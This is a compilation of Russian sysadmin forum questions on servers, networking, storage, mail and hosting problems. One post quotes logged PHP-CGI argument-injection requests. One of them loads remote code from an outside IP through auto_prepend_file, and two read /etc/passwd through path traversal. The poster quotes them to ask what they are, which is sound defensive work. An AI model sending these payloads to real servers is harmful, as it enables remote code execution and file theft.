Собственно вопрос для системного администратора. Если не брать в расчет всяческие NDA/честное пионерское и прочие бумажно-словесные методы и учесть что у всех разработчиков должен быть доступ практически ко всей базе данных by design, иначе им только в потолок плевать от безделья, — можно ли оградиться от возможной утечки данных?

Overdese

На машине под управлением Windows 2k3s развернул Openfire 3.7.1, настроил авторизацию в AD. Все работает замечательно, кроме одно но — пользователей с пустыми паролями не авторизует. В групповых политиках ни какого «криминала» не замечено, пустые пароли разрешены. Куда копать, непонятно.

VBKesha

Есть веб-сервер на котором в данный момент крутится Apache 2.4 и несколько сайтов на разных доменах. В одном из проектов захотелось использовать websocket'ы. Apache висит на 80 порте, IP у сервера один и второй получить не получится, да и не хочется. И вот вопрос как реорганизовать сервер, чтобы запросы приходящий на один из виртуальных хостов проксировался на websocket сервер который висит например на 8081 потру. Желательно конечно обойтись модулем для апача, но рассматриваю и решения на базе Lighttpd/Ngnix, и другие главное проверенные и надёжно работающие.

StopDesign

Есть проект под версионным контролем (git). Под ним вся директория проекта. Но она по каким-то админским причинам принадлежит пользователю root. Админы создали в ней папки и файлы, которые я попросил и поставили на них права на запись. Но сам я не могу удалить или создать файл в корневой директории проекта. Только редактировать могу. И при попытке сделать pull получаю такую ошибку:

error: unable to unlink old '.gitignore' (Permission denied)


Как заставить git работать в таких условиях? Можно его как-то попросить просто обновлять файлы, а не удалять и создавать заново?


Вариант «поговорить с админами и поменять структуру директорий или права» пока не рассматривается.

dcheremnov

Добрый день!

Мы более года хостим сервис у hetzner.
В конце октября поменяли кредитную карту.
Уже 4 число, а в сайте поддержки robot в разделе Invoices пишут — «This amount is not yet paid».
Сейчас до 6-го числа банк не работает и нет возможности узнать, была ли попытка снятия денег,
и если да, какова причина того, что деньги не сняты.
Гугл нам подсказал, что надо писать с просьбой дать информацию по платежу
на сайте robot в разделе Requests с указанием Request type с значением Accountancy
— мы это сделали.

Просим Вашего совета, что еще предпринять, чтобы избежать блокирования акаунта?

Извините, что вопрос затянут.
Было желание поделиться информацией в ряде топиков, но я новичок, пока кармы не хватает.
Пока пишу здесь (не примите за рекламу).
В целом хостингом довольны, железо нам EQ4 дали свежее (глядели по времени жизни винта).
Работает стабильно.

Месяц назад уже были проблемы с кредиткой — они нам вежливо написали о том,
что истек Expires карты.
Мы написали ответ, с просьбой не блокировать акаунт, что мы решаем эту проблему.
Мы оперативно создали виртуальную кредит карту в альфа банке на евро счете,
платеж прошел нормально. И снова получили от поддержки hetzner уже с информацией, что платеж прошел успешно.
Жаль альфа позволяет открыть виртуалку только на месяц, берет небольшую комиссию в переводе на рубли около 50 р.
И вот подключили новую карту, ожидаем…

Благодарю заранее всех за советы.

StopDesign

Я привык к тому, что это удобно: положил копию репозитория на продакшн и делаю git pull при необходимости. Пишу на Питоне и Ruby, поэтому отдельно компилировать ничего не надо: на хостинге лежат те же исходники, что и на домашней машине. И распределенная система управления версиями работает еще и как система развертывания проекта. Бонус: если мой коммит завалил какую-то функциональность и тесты этого не выявили, то всегда можно откатиться на любую другую версию кода без дополнительных инструментов.


Если произошла какая-то экстремальная ситуация и в код на сервере были внесены изменения (мимо версионного контроля), то их легко отследить и даже закоммитить прямо оттуда (хотя, я считаю это неправильным).


В чем минусы такого подхода?


Понятно, что для развертывания проекта есть специальные инструменты. Понятно, что они удобны и необходимы при работе с Джавой, например. Но я не вижу, чем git и hg уступают им в этом плане, если разработка идет на интерпретируемом языке.


Я так понял, однажды кто-то собрал кучу исходников из .svn-директорий, открыто лежащих в веб-пространстве, и теперь все VCS на сервере считаются чем-то плохим. Но нужно же понимать разницу…

djonik1562

Добрый день всем.
Необходимо подобрать высокопроизводительный сервер для:
1. MS SQL 2008 R2 с несколькими базами. 1 база большая ~70ГБ и самая частоиспользуемая
2. Несколько программ нашего производства для поддержания работа наших сервисов

Сейчас работает сервер IBM xSystem x3550 M3 (2 процессора E5620 @ 2.40 GHz, 32 Gb оперативной памяти, Система на жестком диске IBM 500 GB 7.2K 6 Gb/s, NL SAS 2.5", база 70Гб и еще одна наша база на SSD диске). В данный момент имеем трудности с производительностью (Собственно для временного решения и был куплен SSD, стало лучше но все равно проблема полностью не ушла). SQL ограничен в использовании памяти в 12Гб.
Отдельно есть еще IBM xSystem x3550 M2, на котором крутится IIS И наши сайты для обслуживания веб пользователей.

Помогите пожалуйста подобрать сервер до 15000$ для замены главного сервера. Может вместо SSD купить 3 диска со скоростью вращения 15к SAS и сделать из них RAID0, или 1 такой диск для системы и 1 SSD для баз SQL?

Пожалуйста, помогите.

lexxpavlov

Существует следующая система. На удалённом Windows-сервере (Server 2008 R2) периодически запускаются довольно ресурсоёмкие процессы в нескольких экземплярах (с одного экзешника). Кол-во экземпляров от 1 до 20-30 может быть одновременно. Один процесс может съедать до 1 ГБ ОЗУ и прилично процессора (~1 ГГц, если можно так выразиться).

Процессы запускаются, отрабатывают минут 30 и закрываются. По запросу с удалённой системы запускаются новые.

Задача следующая — измерять потребление ресурсов каждым процессом и общей загрузки системы. В идеале искомая программа отправляет емейл/смс при превышении потребления ресурсов, но хотя бы просто ведёт лог у себя с возможностью просмотра.

Стандартный Windows-ский монитор не подходит (ни диспетчер задач, ни системный монитор — последний не может мониторить разные экземпляры одного экзешника, притом подхватывать вновь запущенные, или я не умею его готовить?)

Benelli

Появилась потребность поставить дома железку, которая будет работать в качестве медиаплеера для ТВ, файлосервера и торрентокачалки.

Сначала думал в направлении медиаплееров. Но те, которые нравятся по функциям — ну, там, с торрентокачалкой, браузером, стриммингом сетевых сервисов и т.п. — они стоят где-то 150-200 евро и выше.

А за эти деньги на горизонте начинают маячить простенькие неттопы со всеми вытекающими. Склоняюсь скорее к ним, но, возможно, я неправ. Еще относительно медиаплееров — я вряд ли буду заморачиваться с прошивками. Ну, или точнее, вряд ли буду регулярно себе что-то ставить, хочется настроить один раз — и чтобы работало.

Что хотелось бы от железки:
— относительная всеядность по форматам и качеству — чтобы не тормозил на FullHD и знал mkv
— максимальная бесшумность
— HDMI-выход
— желателен встроенный wifi, чтобы не гадать потом с моделью свистка (это, скорее, про медиаплеер, у неттопа не должно быть проблем со свистками)
— экономичность в плане энергопотребления — железку хочется держать в сети 24/7
— по цене хотелось бы уложиться в 200 евро

Вопросы такие:

— Можно ли приобрести нормальный простенький неттоп за сумму до 200 евро?

— Прав ли я вообще, что смотрю в сторону неттопов? Я смотрел Q&A на хабре по плеерам — вижу, что плееры достаточно всеядны и умны, но, как народ отмечает, это все же не полноценный сервер.

— Вижу на немецком Амазоне вот такую модель, например — Foxconn NT-535 Netbox Atom D525 (HDMI, VGA). Может ли кто-то про нее что-то сказать, подойдет ли такая?

— Посоветуйте модели, пожалуйста, с учетом перечисленных требований.

vvh1te

Есть потребность перенести карту сети из visio-файла в web-интерфейс. Желательно с поддержкой спрайтов из visio.

Кто-нибудь знает подходящие инструменты?

IonianWind

Проблема в следующем:

Стоит node 0.8.14, запущен скрипт, использующий sockjs

Сервер перезапустили, и теперь постоянно сыпется в лог скрипта следующее:
events.js:71 throw arguments[1]; // Unhandled 'error' event ^ Error: accept EMFILE at errnoException (net.js:769:11) at TCP.onconnection (net.js:1017:24)

После перезагрузки я проставил
ulimit -u 1048576 ulimit -n 1048576

Эти значения были до перезагрузки


Вот вывод ulimit -a на данный момент
core file size (blocks, -c) 0 data seg size (kbytes, -d) unlimited scheduling priority (-e) 0 file size (blocks, -f) unlimited pending signals (-i) 509680 max locked memory (kbytes, -l) 64 max memory size (kbytes, -m) unlimited open files (-n) 1048576 pipe size (512 bytes, -p) 8 POSIX message queues (bytes, -q) 819200 real-time priority (-r) 0 stack size (kbytes, -s) 10240 cpu time (seconds, -t) unlimited max user processes (-u) 1048576 virtual memory (kbytes, -v) unlimited file locks (-x) unlimited

Система CentOS 6 x64

Гуглил, пока не нашел решения

likejavascript

Поставил nodejs на Ubuntu Server 12.04. Теперь мне нужно запускать nodejs от пользователя, который имеет только доступ на запуск nodejs сервера и доступ на директорию проекта. Подскажите как создать такого пользователя и ограничить ему права?


Приложение хранится в директории /var/www/app

yeputons

Всем привет.

Есть роутер ASUS RT-N16 с модемом от Ростелекома. Раздаёт интернет всем по WiFi/витухе, в том числе и серверу. Недавно как дополнительный канал появилась Yota, хочется качать-раздавать через неё торренты, чтобы не забивать ADSL для сёрфинга.


По-хорошему, как мне кажется, надо перепрошить роутер на DD-WRT и копать уже там, однако времени и желания этим заниматься пока нет. Есть ли способ добиться такого эффекта, подключив модем напрямую к серверу? Хочется пускать все торренты (например, запросы на большие порты/от заданных программ) через Yota, а не ADSL (который раздаётся через локалку). Используются BitComet / uTorrent

tarya

Добрый день друзья.

Помогите кто чем может разобраться с хостером. Клиент предоставил хостинг, некий Alkar.net где судя по хелпам ничего не менялось с десять лет, еще успешно используют CGI и так далее.

Когда я начал заливать сайт, в котором есть .htaccess с некоторыми правилами все стало колом 500 ошибки, но я такое встречаю время от времени особенно на хостингах Франции и Бельгии, но стоит найти и закоментить некоторое правило или добавить какое то новое которое они рекомендуют и все работает. Но стал я пытаться отыскать в чем проблема в этот раз наткнулся на то что никогда не мешало.

Само правило очень простое:
RewriteRule ^(?!admin/|css/|images/|inc/|js/|m/|pma/)(.+)$ index.php [L,QSA]

То есть все что не начинается на admin/|css/|images/|inc/|js/|m/|pma — передается на index.php. Это правило работало уже 4 года и я его никогда нигде не трогал и трогать тут нечего, работает оно и на моем тестовом хостинге, но у этого провайдера все выпадает в 500. Ему не нравится "?!" то есть отрицание того что идет далее.

Друзья, подскажите как быть, на этом правиле все и работает, без него никуда.

Спасибо за ваши советы и время.

Bashuk

Товарищ Rzhepish у себя в кладовке разместил небольшой серверок. Машинка жужжит 24/7 (с перерывами лишь на внеплановые отключения электричества в микрорайоне), имеет статический внешний IP. Управляет этим моторчиком Ubuntu 12.04 LTS.

Нам не хватает идеи.

Хочется сделать что-то до боли простое, но при этом приятное, в духе минимализма. По типу твиттер-бота… Хмм.

Помню, до того, как мне в руки попал этот самый сервер, у меня все время были какие-то идеи, для которых просто не хватало машины, которая работала бы круглосуточно. Теперь они все таинственно испарились. Но хабраюзер найдет что посоветовать, ведь так?

baalmor

Всем привет.

У меня на машине с freebsd 8.3 есть две группы пользователей — wheel и staff. Причем пользователи группы staff не имеют привилегий группы wheel.

есть некая папка с данными. к примеру /usr/whole

мне надо сделать так, чтобы ко всем документам этой папки был одинаковый доступ как у членов wheel так и у членов staff но при этом сохранить дифференцирование членов обеих групп за пределами этой папки. Как можно организовать такое?

Гугл не помогает, так-как у меня не получается грамотно сформировать запрос, ну или удача отказывает. :)

Casufi

Мне нужно сделать доступ к определенным страницам по PGP ключу, весь трафик от сервера должен шифроваться открытым ключом пользователя, и на клиенте расшифровываться закрытым ключом.

Есть интересный модуль для apache — en.wikipedia.org/wiki/Mod_openpgp он работает с модулем Enigform и позволяет использовать на своем сайте асинхронное шифрование.

Подскажите, есть возможность использовать OpenPGP совместно с GlassFish?

axis_ua

Появилась необходимость создать отказоустойчивый кластер MS SQL, и заодно увеличить производительность БД, путем увеличения скорости работы дисковой системы (узкое место). Сейчас присматриваюсь к недорогому решению Supermicro www.supermicro.com/products/system/4U/6047/SSG-6047R-E1R36N.cfm. Подскажите, стоит ли смотреть в сторону Supermicro, или рассматривать аналогичные решения от IBM, EMC, HP и т.д.? В чем реальная разница? Бюджет на СХД — до 20000$. На данный момент база работает на HP DL380p8gen, на 8ми SAS дисках 15k в RAID 50. Планируемая конфигурация Supermicro — 28 SAS 15K по 300Gb, и 8х100Gb SSD cache. Также планируется это хранилище использовать и для хранения ВМ Vmware, в случае, если загрузка будет невысокой. Размер БД MS SQL 200Gb.

PlatinumArcade

Я, дело в том, что пока слаб в настройке iptables. До этого всё время суппорт помогал. Сейчас же всё в моих неопытных руках…

VPS-ка упорно не хочет подключатся к удаленным хостам по 80 порту. Хотя политики в iptables, вроде, ACCEPT все:



Соответственно и wget не может до файлов достучаться.

Пробовал добавить пару правил для 80 портов — всё равно не подключается.
iptables -A INPUT -p tcp -m tcp --sport 80 -j ACCEPT
iptables -A OUTPUT -p tcp -m tcp --dport 80 -j ACCEPT

При временном отключении iptables всё становится нормально.

При этом пинг на ya.ru проходит. И что это за NFQUEUE. Ничего нагуглить не могу -(

Madmess

Можно ли как-то избавиться от сегментации логических томов в LVM без пересоздания разделов?

Вот, например, раздел / состоит из 4 сегментов.


root@server [~]# lvdisplay

— Logical volume — LV Name /dev/VolGroup00/LogVol01

VG Name VolGroup00

LV UUID vOMPbA-5xqb-IDgU-o2Tl-xHtv-CvKF-IbzdJ9

LV Write Access read/write

LV Status available

# open 1

LV Size 15.41 GB

Current LE 493
Segments 4

Allocation inherit

Read ahead sectors auto

— currently set to 256

Block device 253:0

jetman

Что имеем:
2x Intel 520 180GB (SSDSC2CW180A3) RAID контроллер 3ware 9650SE, отключен Write Cache. Ubuntu 12.04, файловая система ext3. Никакие параметры системы специально для SSD не изменялись.
Что получаем, например для Sequential Read:
hdparm -tT /dev/sda /dev/sda: Timing cached reads: 29078 MB in 2.00 seconds = 14555.91 MB/sec Timing buffered disk reads: 592 MB in 3.01 seconds = 196.79 MB/secВроде бы удовлетворительно.

Sequential Write:
dd count=1024 bs=1M if=/dev/zero of=/opt/test.img conv=fdatasync,notrunc 1024+0 records in 1024+0 records out 1073741824 bytes (1.1 GB) copied, 123.776 s, 8.7 MB/s А вот тут разочарование. Ожидал хотя бы 100мб/сек.

Что делаю не так? Или SSD и RAID1 изначально плохая идея?

Попробовать просто так один SSD или Software RAID не могу — это арендуемый сервер.

natalka

Мы предоставляем web- и dns-хостинг клиентам (на базе Parallels Plesk Panel). Постоянно возникают неопределённые проблемы с доступностью сайтов наших клиентов.

Как правило с DNS. То DNS провайдера пользователя не отдаёт адрес сайта вообще, то отдаёт неправильный. После обновления адреса сайта, провайдерские DNS обновляются с большой задержкой (особенно этим грешит Ростелеком — до 3-х дней).

Господа хостеры, какого рода проблемы чаще всего у Вас возникают? Как часто? Как вы с ними боретесь?

Есть ли здесь хостеры, использующие Plesk? Как вы боретесь за повышение доступности сайтов клиентов?

appplemac

Добрый день.

На сервере (VPS) присутствует только внешний IP-адрес. Как заставить L2TP VPN работать с клиентскими устройствами (раздавать внутренние IP-адреса)? Создать виртуальный NIC и для него поднять DHCP и настроить роутинг?

Заранее спасибо за ответы.

d3ZORg

Слышал и читал о logstash, graylog2, splunk, zenoss и прочих системах.

Не знаю к чему склониться. Хотелось бы услышать мнение и отзывы людей, которые используют указанные (и альтернативные) системы централизованного хранения и просмотров/визуализации логов.

Ingtar

Доброго дня, уважаемые Хабровчане!
Ситуация следующая:
Есть три роутера Asus RT-N16 с прошивкой от энтузиастов. Один выступает как AP, другие репитерами. Соотвественно SSID одна, настройки один, пользователь прозрачно переходит из зоны одного роутера в зону другово и сеть не теряется. Мимимимими.
Но возникает беда. Нет, возникает ПЕЧАЛЬ! Иногда что-то в идеальном мире ломается и клиенты репитеров перестают получать IP адреса от главного (Висит получение IP адреса от SSID. Возле главного все окей). Передергиваем (ребутим) главного — все восстанавливается до следующего раза. Сейчас превентивно ребутим главный роутер по крону каждые 4 часа. Но это ведь костыль.

Решил попробовать другие прошивки — родную асусовскую и DD-WRT.
Родная выглядит красиво, но мало что умеет. Установка моста между роутерами закончилась ничем.
DD-WRT понравилась, но при установке Repeater Bridge по инструкции (http://www.dd-wrt.com/wiki/index.php/Repeater_Bridge) на каждый бридж нужна своя SSID (итого две лишние сети, которые очень меня раздражают) И коннект должен быть к каждой в своей зоне. Т.е. не подхватывается клиент с другово репитера

Существует ли правильный способ сделать одно большое покрытие сети на какой-нибудь прошивке?
Или чтобы не отваливалось теперешнее соединение. Или расскажите- как этот вопрос организован у вас? Какой-нибудь единый центр управления Wi-Fi?..

levap

Помогите определиться с технологией (а еще лучше — готовой библиотекой) для реализации сервера TCP-соединений. Количество одновременных соединений максимально большое, объем передаваемого трафика при этом минимальный. Обмен двунаправленный.

Проект — сервер сбора телеметрической информации с GSM-терминалов. Целевая платформа Linux. Язык не особенно важен, вероятнее всего С++, Java.

fredrsf

Добрый день, у меня VPS с plesk panel 11 и nginx. В панели плеска существует два веб окружения. В одном из них еще пара поддоменов. Без каких либо то причин вдруг заходя по адресам сайтов на хостинге все вели на один. То есть домены сайтов из другого веб окружения и поддомены все вели на одну папку с файлами, а должны каждый на свою вести. Честно говоря не понятно почему так происходит, в администрировании nginx не силен. Смотрел конфигурационные файлы, но там вроде бы везде правильные папки указаны. Поддержка не шевелится и говорит, что им нужно много времени или же у меня есть возможность оплатить услуги их специалиста 100$ в час.Подскажите, пожалуйста в какую хоть сторону копать…

AlexSam

Проблема такая: есть сервер написанный на ноде. Сервер открывает TCP сокет: порт и начинает его слушать (Подчеркиваю — не HTTP, обычный TCP сокет). К этому сокету подключаются клиенты (флешовые) и что-то слушают. Специфика работы сервера такова, что клиенты ему практически ничего не шлют, а шлет только сервер. Клиент шлет только команду авторизации при подключении. Сервер же посылает при необходимости клиенту команды. Так вот, довольно часто, примерно в 10% случаев данные от сервера клиенту не доходят. Причем зависимость определить не удается. Иногда может случится так, что сразу после авторизации данные не дойдут, иногда после некоторого промежутка времени. Причем соединение не отпадает и при следующей отсылке данных все доходит нормально.
Так вот вопросы:
— что сделать, чтоб гарантированно быть уверенным в том, что данные доходят?
— если первое не возможно, то как отследить на сервере, что данные дошли до клиента не прибегая к эхо ответам от клиента?
— что за метод socket.pipe(socket) в примере на главной сайта nodejs.org? В доке его не нашел но может он как-то поможет.

Если кто-то сталкивался с подобной ситуацией или хорошо знает работу пакета NET (http://nodejs.org/api/net.html) — помогите решением проблемы.

P.s. Сервер DEV совсем не нагружен. Только разработчики. Списывали на лаги сети, но 10% случаев это чересчур, учитывая что пинги ходят нормально.

Isis

Помнится нам тут обещали запуск антиддос сервиса 15 ноября за 5$ в месяц.
Пост найти не удалось ни хабром, ни гуглом.

TIEugene

Или другой редиректор TCP.
Пусть есть машина A, которая работает с машиной B — которая перенаправляет всё (или то, что надо) на машину C с помощью rinetd.
На участке B-C как-то виден адрес A? Имеется ввиду средствами провайдера сети C.

wartur

Тематика следующая и озаглавить её можно так: «Настройка lamp сервера в домашних условиях».


Сам являюсь программистом, но вот занимаюсь разносторонней деятельностью. Среди всего я недавно изучил очень большое количество настроек всевозможных вещей: nginx, apache, php, mysql, postfix(я уже писал об этом), кое что понимаю в базовых проблемах железа.


На кого ориентирован цикл статей:

Программисты, а так же люди, которые думают переезжать с хостинга на виртуальный/выделенный сервер и которым нужна универсальная настройка системы аля «хостинг только мощней». Для профессионалов наверное будет не интересно, но я надеюсь, что они дадут еще какие-нибудь советы, ибо слышал, что правильная настройка сети может давать прирост производительности.


Среди тем:


Сборка сервера на основе платформы начального уровня intel s3420gp, какие могут быть проблемы, особо глубоко не вдаваясь, но все-таки некоторые вещи замечу, что бы не наступали на грабли. Например с оперативной памятью, либо с выбором дисков.


Базовая настройка сервера на основе debian squeeze, установка софта, базовые средства мониторинга, бекапы, репозитории, которые бы я советовал (для меня было открытием, что их множество и я нашел интересные подборки для себя). Базовая настройка фаервола.


Настройка lamp, фронтент, бэкенд, кеширование опкода пхп, база данных, кеширование данных. Расчет возможностей сервера, расчет оперативной памяти (делаю на глаз очень грубо), защита от атак на бэкенд.


====


Как-то так сумбурно пока. В общем, если интересно, то я напишу обо всем этом последовательно.

Писать буду не сразу. Сейчас я занят — занимаюсь настройкой MySQL, сделал половину =).

UPD1: 2012.11.17 18:00

Понял пожелания. Учту. Тогда я начну с настройки lamp, а все остальное потом.

NightWriter

Добрый день. Подскажите, как лучше всего организовать файлопомойку для дизайнеров, если есть много места на сервере у Hetzner. Ставить SAMBA? FTP? Или есть человеколюбивые интерфейсы, чтобы удобно было и не надо было миллион паролей запоминать?

Zack

Сейчас мне требуется выбрать средство для виртуализации нескольких важных серверов. Железка с двумя процессорами и множеством оперативной памяти. Требования, это удобство управления и производительность. Сначала выбор пал на Hyper-V 2008, но как оказалось у него есть досадное ограничение по количеству оперативной памяти на одну виртуальную машину, в размере 8гб для Windows Server 2008 r2(а требуется хотя бы 25). Vmware esxi не подошел по цене (да и пробная версия поддерживает 1 физический процессор). Требуется дельный совет в выборе.

L3n1n

Здравствуйте.

Нужно реализовать балансировку нагрузки на файловые сервера.

Несколько месяцев назад большая часть файлов была переброшена на один сервер с гигабитным каналом. Сейчас вся нагрузка уперлась в скорость канала…

В запасе есть еще несколько серверов на которых простаивает канал.

Вариант с расширением канала на нагружаемом сервере не выгодный по деньгам.

Делать полное зеркало сервера тоже нет возможности.


Есть возможность брать самые качаемые файлы с сервера 1 и разбрасывать их по другим серверам.

Может кто-то подскажет методы как это организовать?

danielnewman

Нигде не могу найти ответа на этот вопрос. В вики Hetzner'а пишут примеры с минимальным TTL 86 400, т.е. 24 часа.

nikitac

Всем доброго времени суток


Имеется домашняя сеть с десктопом, ноутбуком, несколько смартфонов и hd плеер.


Пожалуйста посоветуйте легкое решение для сетевого хранилища для этих устройств.

Nothingman

Собственно вопрос в заголовке, чем меньше трат соответственно лучше, желательно готовые решения, а если есть опыт использования то еще лучше. Поднять на старом компе тоже исключается.

Благодарю за помощь.

danielnewman

Чищу локальный dns-кеш:
ipconfig /flushdns
Иду на хабр пингом, nslookup'ом, через Chrome. Смотрю
ipconfig /displaydns | more
Вижу закешированный /system32/drivers/etc/hosts и более ничего.

Где лежит и как посмотреть? В серверной винде есть dnsmgmt, а что делать на десктопе и где смотреть остальное содержимое кеша?

UPD:
Заход через Firefox и IE оставили записи в dns-кеше.
Ушел искать хитрости Chrome в работе с кешом. Спасибо.

UPD2:
Грешу на встроенный экспериментальный асинхронный DNS-клиент,
выставленный в chrome://flags/

danielnewman

Чужие сиси, для привлечения внимания.


Есть проект, по которому все еще больше вопросов, чем ответов (не Хабр). Хочется рассказать о том, как и почему мы делаем, что бы добиться заветного HA-статуса его работы и сохранности наших данных меньшей кровью. Клиенты получат решение, а все размышления уйдут в песок.


История пойдет от вопросов с DNS и докатиться до анализа производительности и настроек служб мониторинга какой-нибудь MySQL. Возможно про облака что-то будет, если понадобится и будет выбран Amazon Route 53 (почему-то вкуснее выглядит чем ЗерАйГоу). Уровень будет не очень продвинутый, но на комментаторов уповаю.


P.S. А вообще, я бы с удовольствие коллективно перемусолил архитектуру TM и её проектов, но не нашел никакой информации в паблике. Схему набросал в Mindjet на основании виндовых консольных инструментов.)

FFF

Приветствую!

Для одного некоммерческого проекта иногда появляется необходимость размещать где-нибудь аудио-записи длиной ~2 часа и, соответственно, вставлять их на страницу для публичного прослушивания. Сразу полез посмотреть на soundcloud, но он немного про другое и в бесплатном режиме ограничение 2 часа на аккаунт. В идеале, хотелось бы что-то вроде ютюба для аудио. Есть, конечно, подкаст терминалы, но учитывая специфичность записей — это не совсем целевое использование. Конечно, на крайний случай придется закачивать в какое-нибудь облачное хранилище и платить за трафик, но хотелось бы обойтись минимальными вложениями.


Кто-что подскажет?


Спасибо.

ilyaplot

Процесс System слушает 80 порт, на котором должен висеть ненавистный Kerio mail server.
Т.к. system стартует раньше, kerio молча выключает службу.
В данный момент сделан костыль в виде маппинга на 81 порт.
Как узнать, что же именно слушает 80 порт?

Foror

Хочу как минимум 256 Gb памяти (ECC), а лучше 512 Gb. Производительность процессора не имеет особого значения. Собрать хочу самостоятельно, т.е. дорогие-готовые решения не интересны. Что будет дешевле платформа на Intel или AMD?

Или может есть смысл сделать два сервера по 128 Gb и это будет определенно дешевле одного сервера с 256 Gb?

sallyruthstruik

Купил хранилище Thesus N2200 PLUS и жесткий диск Caviar Blue SATA 1TB 64MB Cache. Втыкаю его в хранилище, захожу в админку, и хранилище никак его не видит. Создать RAID тоже никак не получается. В чем может быть причина?

Serafim

Дано:
Три сервера, следующей конфигурации:

4-х ядерный процессор AMD Athlon II X4 640

16 ГБ оперативной памяти

14 жестких дисков, два по 250 Гб объединенных в raid-1 (hardware) для ОС и софта, двенадцать по 2 Тб объединенных в raid-6 (mdadm) для самого хранилища, т.е. фактически с учетом издержек на raid и файловую систему доступно 19 Тб пространства)

итого порядка 57 Тб пространства в сумме
Существующие данные:

3 000 000 картинок, средний размер около 1 Мб (преимущественно это фотографии и скриншоты)

100 000 разношерстных файлов, средний размер очень условно 150 Мб, на деле от 100 Кб до 4 Гб

итого около 18 Тб данных
Программное обеспечение:

операционная система: Debian 6

текущая система хранения данных: mogilefs


Надо:
Простой (к примеру основанный на HTTP) интерфейс CRUD-операции с объектами в хранилище (можно без U). Требования работать с хранилищем как с обычным локальным разделом (POSIX-совместимая файловая система) нет, но если такое тоже достижимо — будет хорошо.
Возможность прочитать фрагмент объекта (необходимо для псевдостримминга видео).
Иметь избыточность данных (raid не решает задачи, когда вышел из строя весь сервер или с сервером потеряна связь), т.е. один объект должен храниться как минимум на двух серверах.
Иметь возможность разнести сервера по разным (двум) дата-центрам.
Крайне желательно, чтобы система не требовала отдельного сервера для хранения meta-данных (так называемый name-сервер), т.к. это создает дополнительную точку отказа.
Система должна иметь возможность анализировать свое состояние, т.е. проверять наличие необходимого числа копий для объектов, в идеале проверка консистентности объектов (но это накладывает определенные требования, такие как вычисление контрольной суммы для объектов и хранение трех копий, для возможности чтения с кворумом, поэтому это не требование, а пожелание к системе).
Система должна иметь возможность перераспределить объекты между хранилищами, т.е. когда появится четвертый сервер, то данные должны быть равномерно перераспределены между всеми серверами.
Совсем идеально иметь возможность установить ttl для объекта (т.е. чтобы по прошествии заданного времени объект был удален или помечен как удаленный).
Система должна уметь удалять объекты, т.е. когда объект удаляется или помечается как удаленных, он действительно должен быть удален, допускается это делать с задержкой.
Решение должно быть полностью программным, никакого дополнительного оборудования или замена существующего.


Что уже пробовали:
MogileFS. Данное решение было выбрано около 3-лет назад и используется сейчас, в принципе оно отвечает ряду требований, но сложность его сопровождения (на деле это набор perl-скриптов) и отсутствие поддержки остальных требований заставило меня задуматься и поискать альтернативы.
GridFS (mongodb). Очень медленно и сыро, я не буду детально расписывать что не так с гридфс, отмечу что тестировал его полтора года назад, возможно сейчас с ним все намного лучше, поэтому просто просьба этот вариант не предлагать, я о нем знаю.


Просьба к сообществу

Буду благодарен услышать ваши предложения относительно выбора программного обеспечения для хранилища отвечающего указанным выше требованиям. Отдельно интересует услышать об опыте работы с Elliptics (ioremap.net, elliptics.ru) из описании на сайтах складывается впечатление, что это практически «серебряная пуля», но отсутствии сведений о реальном использовании вызывают опасение использовать данное решение в бою. Спасибо.

Tobishua

Имеется VPS с dovecot и exim4, случайным образом заметил, что имеется огромное количество frozen mails. По выводу mailq много записей наподобие:
45m 1.4K 1TeQCI-0000yr-IL *** frozen ***
smmsp@hostname

25m 1.4K 1TeQVd-0001wI-T0 *** frozen ***
smmsp@hostname

5m 1.4K 1TeQp0-0002xP-42 *** frozen ***
smmsp@hostname
Как чистить знаю, интересует вопрос, как этого избежать?
P.S. Двухчасовое копание гугла не помогло.

danielnewman

$url = "http://example.com/×××××/loader.html"; $code = @file_get_contents ($url); echo $code;

apilichev

В частности Disaster recovery 10 версии и SDR 12 версии, нюансы использования дополнительных модулей, взаимодействие с VMWare, лицензирование, BE+фришный эмулятор ленточной библиотеки?

NightWriter

Идей никаких, траффик не набегает в эти периоды, кронтаб посмотрел. Все остальное время – идеально работает. Просто не понимаю, что происходит, может, кто что подскажет?

crashcube

Доброго времени суток!

Есть сервер, на котором крутят фронтэнд и веб-сервис для iOS версии приложения. Основной идеей приложения является ежедневная рассылка некоторого контента. Так как этот контент наполняется через админку, он хранится в БД этого же сервера. Плюс есть немного логике, т.е. система учитывает номер последней рассылки, есть возможность приостановить рассылку и т.д. (это я к тому, что просто перейти на сервис рассылок — не самый простой вариант).

Меня интересует, почему письма, отсылаемые с помощью PHP (функция mail), могут попадать в спам? Системный администратор утверждает, что 100 000 писем в день — не проблема для сервера, но письма все равно будут попадать в спам, т.к. некоторые пользователи будут жать кнопку спам. Здесь можно зарегистрировать feedback loops. А могут ли быть еще какие-то причины попадания туда и как их устранить?

Заранее, спасибо!

baalmor

Всем привет.

Просматривал логи запросов к www серверу и обнаружил такие интересный POST запрос. Не подскажите ли, чего добивался автор?

&quot;POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://129.171.178.13/pmwiki/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://129.171.178.13/pmwiki/api.gif%20-n HTTP/1.1&quot;


попутно,

&quot;POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1&quot;


и

&quot;POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1&quot;


с этими двумя запросами суть понятна, но не понятно, что пытались эксплуатировать. Может кто-нибудь удовлетворить мое любопытство и, может быть, предостеречь? )


Спасибо.

DmitryAnatolich

Уже когда-то задавал подобный вопрос, но ответов, к сожалению, не хватило, чтобы все привести в порядок.
Итак, есть «сервер» (в кавычках, потому что сервером принято называть бесперебойное и непроблемное оборудование), на котором крутится RemoteApp c 1C-кой.
Конфигурация:
CPU: Intel Core i7-870 (Lynnfield, B1)
2933 MHz (22.00x133.3) @ 3210 MHz (24.00x133.8)
Motherboard: ASUS P7P55D PRO
Chipset: Intel P55 (IbexPeak)
Memory: 16384 MBytes @ 668 MHz, 9.0-9-9-24
— 4096 MB PC10600 DDR3 SDRAM — Samsung M378B5273CH0-CH9
— 4096 MB PC10600 DDR3 SDRAM — Samsung M378B5273CH0-CH9
